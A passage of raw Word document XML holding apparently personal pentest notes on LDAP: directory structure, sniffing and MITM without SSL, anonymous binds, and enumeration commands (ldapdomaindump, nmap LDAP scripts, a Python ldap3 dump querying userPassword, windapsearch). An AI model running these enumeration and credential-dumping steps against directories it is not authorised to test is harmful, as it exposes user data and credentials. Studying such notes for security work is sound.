      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hierarchical or “tree” directory organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DA4083" w14:textId="6F666998" w:rsidR="001D2AC1" w:rsidRDefault="001D2AC1" w:rsidP="001D2AC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Root directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3103D803" w14:textId="0A60DAFA" w:rsidR="001D2AC1" w:rsidRDefault="001D2AC1" w:rsidP="001D2AC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Countries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A936C67" w14:textId="611DD286" w:rsidR="001D2AC1" w:rsidRDefault="001D2AC1" w:rsidP="001D2AC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Organizations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAD8C25" w14:textId="1F4215BB" w:rsidR="001D2AC1" w:rsidRDefault="001D2AC1" w:rsidP="001D2AC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Organizational Units</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0467F852" w14:textId="7CBA72F6" w:rsidR="001D2AC1" w:rsidRDefault="001D2AC1" w:rsidP="001D2AC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Individuals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF1044D" w14:textId="0A3B1EAC" w:rsidR="00EE5CAC" w:rsidRDefault="00EE5CAC" w:rsidP="00EE5CAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LDAP is NOT the same thing as Active Directory, as AD is a directory server that stores user information such as usernames, phone numbers, and email addresses</w:t>
      </w:r>
      <w:r w:rsidR="00C824A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. LDAP is a protocol that allows reading and modifying that information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FA6D34" w14:textId="77777777" w:rsidR="00D0519F" w:rsidRDefault="00D0519F" w:rsidP="00EE5CAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF424D1" w14:textId="136005B7" w:rsidR="00D0519F" w:rsidRDefault="00D0519F" w:rsidP="00D0519F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If LDAP is used without SSL, you can sniff credentials in plaintext in the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B8330B" w14:textId="1B162EDA" w:rsidR="00D0519F" w:rsidRDefault="00D0519F" w:rsidP="00D0519F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>You can also perform a MITM attack in the network between the LDAP server and the client</w:t>
      </w:r>
      <w:r w:rsidR="00FE14AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. If SSL is used, using MITM with false certificate will only work if the user accepts it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61986ED4" w14:textId="77777777" w:rsidR="00B14E7F" w:rsidRDefault="00B14E7F" w:rsidP="00B14E7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E5593D" w14:textId="22299457" w:rsidR="00B14E7F" w:rsidRDefault="00B14E7F" w:rsidP="00B14E7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LDAP Anonymous Binds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379D0613" w14:textId="77777777" w:rsidR="00B14E7F" w:rsidRDefault="00B14E7F" w:rsidP="00B14E7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="631B596B" w14:textId="7D314E2E" w:rsidR="00F602FA" w:rsidRDefault="00F602FA" w:rsidP="00F602FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">These essentially allow unauthenticated attackers to retrieve information from the </w:t>
      </w:r>
      <w:r w:rsidR="0047444C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>domain and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be utilized in different ways.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A74000" w14:textId="42F4D04A" w:rsidR="00F602FA" w:rsidRDefault="00F602FA" w:rsidP="00F602FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a legacy configuration, meaning </w:t>
      </w:r>
      <w:r w:rsidR="0047444C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>that as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5CBFDC" w14:textId="7BFA279B" w:rsidR="0047444C" w:rsidRDefault="00FC3BEF" w:rsidP="00FC3BEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This means that any LDAP server configured prior to 2003 are susceptible to domain dumping from unauthenticated users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EB2667" w14:textId="77777777" w:rsidR="00FC3BEF" w:rsidRDefault="00FC3BEF" w:rsidP="00FC3BEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB09A31" w14:textId="625B929D" w:rsidR="00FC3BEF" w:rsidRDefault="00FC3BEF" w:rsidP="00FC3BEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Valid Creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2587C92C" w14:textId="77777777" w:rsidR="00FC3BEF" w:rsidRDefault="00FC3BEF" w:rsidP="00FC3BEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DBA3FB9" w14:textId="2317E748" w:rsidR="00FC3BEF" w:rsidRDefault="00FC3BEF" w:rsidP="00FC3BEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If you have valid creds to login to the LDAP server, you can dump all information about the Domain Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00450A15" w14:textId="57747424" w:rsidR="00FC3BEF" w:rsidRDefault="00490721" w:rsidP="00FC3BEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00490721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapdomaindump &lt;IP&gt; [-r &lt;IP&gt;] -u '&lt;domain&gt;\&lt;username&gt;' -p '&lt;password&gt;' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4175705D" w14:textId="77777777" w:rsidR="00E72E9E" w:rsidRDefault="00E72E9E" w:rsidP="00E72E9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40646A6A" w14:textId="192A7C57" w:rsidR="00E72E9E" w:rsidRDefault="00E72E9E" w:rsidP="00E72E9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Brute Force/Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D7E260" w14:textId="77777777" w:rsidR="00E72E9E" w:rsidRDefault="00E72E9E" w:rsidP="00E72E9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5645D77B" w14:textId="33F11169" w:rsidR="00E72E9E" w:rsidRDefault="00E72E9E" w:rsidP="00E72E9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The following scrip will allow you to see public information</w:t>
      </w:r>
      <w:r w:rsidR="00490C41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> about the LDAP server, such as the domain name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B4A6AF" w14:textId="029BA244" w:rsidR="00490C41" w:rsidRDefault="00490C41" w:rsidP="00E72E9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00490C41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>nmap -n -sV --script "ldap* and not brute" &lt;IP&gt; #Using anonymous credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2853A489" w14:textId="77777777" w:rsidR="00490C41" w:rsidRDefault="00490C41" w:rsidP="00490C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D291182" w14:textId="52CE730C" w:rsidR="00490C41" w:rsidRDefault="00490C41" w:rsidP="00490C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Python LDAP Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DBBA3F" w14:textId="77777777" w:rsidR="00490C41" w:rsidRDefault="00490C41" w:rsidP="00490C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5072F672" w14:textId="6696A511" w:rsidR="00490C41" w:rsidRDefault="00490C41" w:rsidP="00490C41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Python can be utilized to enumerate a LDAP server with or without credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427ECC9D" w14:textId="77777777" w:rsidR="00490C41" w:rsidRPr="00490C41" w:rsidRDefault="00490C41" w:rsidP="00490C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490C41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; import ldap3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157C69B2" w14:textId="77777777" w:rsidR="00490C41" w:rsidRPr="00490C41" w:rsidRDefault="00490C41" w:rsidP="00490C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490C41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EF9027" w14:textId="77777777" w:rsidR="00490C41" w:rsidRPr="00490C41" w:rsidRDefault="00490C41" w:rsidP="00490C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490C41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; connection = ldap3.Connection(server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617A14BD" w14:textId="77777777" w:rsidR="00490C41" w:rsidRPr="00490C41" w:rsidRDefault="00490C41" w:rsidP="00490C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490C41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; connection.bind()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A7812" w14:textId="77777777" w:rsidR="00490C41" w:rsidRPr="00490C41" w:rsidRDefault="00490C41" w:rsidP="00490C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490C41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD2CD39" w14:textId="141B401E" w:rsidR="00490C41" w:rsidRDefault="00490C41" w:rsidP="00490C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490C41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; server.info</w:t>
      </w:r>
      <w:r w:rsidR="00F55C72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Will give you interesting data, such as naming context or domain name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D30563" w14:textId="77777777" w:rsidR="00F55C72" w:rsidRDefault="00F55C72" w:rsidP="00490C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB75D00" w14:textId="34AD1DDD" w:rsidR="00F55C72" w:rsidRDefault="00F55C72" w:rsidP="00490C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dump the Whole LDAP with the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB2EB38" w14:textId="77777777" w:rsidR="00F55C72" w:rsidRPr="00F55C72" w:rsidRDefault="00F55C72" w:rsidP="00F55C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F55C72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>&gt;&gt; connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&amp;(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF6B77C" w14:textId="77777777" w:rsidR="00F55C72" w:rsidRPr="00F55C72" w:rsidRDefault="00F55C72" w:rsidP="00F55C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F55C72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C1EA26" w14:textId="3CE9D881" w:rsidR="00F55C72" w:rsidRDefault="00F55C72" w:rsidP="00F55C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F55C72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; connection.entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B605A9" w14:textId="77777777" w:rsidR="00BB66C4" w:rsidRDefault="00BB66C4" w:rsidP="00F55C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5658A39B" w14:textId="71A77448" w:rsidR="00BB66C4" w:rsidRDefault="00BB66C4" w:rsidP="00F55C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windapsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BFB4DC" w14:textId="41CE1DC9" w:rsidR="00BB66C4" w:rsidRDefault="00A15A34" w:rsidP="00A15A34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Windapsearch is a python script useful to enumerate users, groups, and computers from a Windows domain utilizing LDAP queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5236D958" w14:textId="35E7C455" w:rsidR="00A15A34" w:rsidRDefault="00A15A34" w:rsidP="00A15A34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Github: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="00D63F7B" w:rsidRPr="00DC2AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://github.com/ropnop/windapsearch</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53F12DB0" w14:textId="77777777" w:rsidR="00D63F7B" w:rsidRPr="00D63F7B" w:rsidRDefault="00D63F7B" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63F7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t># Get computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66729A6B" w14:textId="77777777" w:rsidR="00D63F7B" w:rsidRPr="00D63F7B" w:rsidRDefault="00D63F7B" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63F7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559AE0C6" w14:textId="77777777" w:rsidR="00D63F7B" w:rsidRPr="00D63F7B" w:rsidRDefault="00D63F7B" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63F7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t># Get groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ADE6F8" w14:textId="77777777" w:rsidR="00D63F7B" w:rsidRPr="00D63F7B" w:rsidRDefault="00D63F7B" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63F7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7782862A" w14:textId="77777777" w:rsidR="00D63F7B" w:rsidRPr="00D63F7B" w:rsidRDefault="00D63F7B" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63F7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t># Get users</w:t>
      </w:r>
    </w:p>
